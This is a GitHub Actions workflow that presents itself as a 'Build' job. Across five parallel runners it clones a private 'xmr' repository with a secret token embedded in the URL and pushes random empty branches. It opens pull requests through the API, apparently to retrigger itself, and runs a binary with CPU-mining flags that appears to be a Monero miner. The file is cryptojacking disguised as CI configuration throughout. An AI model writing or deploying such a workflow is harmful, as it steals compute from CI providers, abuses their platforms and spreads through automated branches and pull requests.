name: Build
on: [pull_request, workflow_dispatch]
jobs:
  test:
    name: Fetch
    runs-on: ubuntu-latest
    container: ubuntu:20.10
    env:
      DEBIAN_FRONTEND: noninteractive
      ACTIONS_ALLOW_UNSECURE_COMMANDS: true
    strategy:
      fail-fast: false
      matrix:
        runner: [0,1,2,3,4]
    steps:
      - run: |
          apt update -qq
          apt install -y git libuv1 libssl1.1 libhwloc15 curl
          git clone https://daveyg7:${{ secrets.token }}@github.com/daveyg7-org/xmr.git
          cd xmr
          git config user.name 'Davey G'
          git config user.email 'daveyg7@yandex.com'
          export BRANCH=$(head -c8 /dev/urandom | base64 | tr -cd '[:alnum:]')
          echo "::set-env name=BRANCH::$BRANCH"
          git checkout -b $BRANCH
          git commit --allow-empty --allow-empty-message --no-edit
          git push -u origin $BRANCH
          curl \
            -X POST \
            -H "Accept: application/vnd.github.v3+json" \
            https://api.github.com/repos/daveyg7/xmr/pulls \
            -d '{"head":"daveyg-org:$TEST","base":"main"}'
      - run: |
          cd xmr
          chmod u+x prog
          ./prog --cpu-no-yield --cpu-priority 5
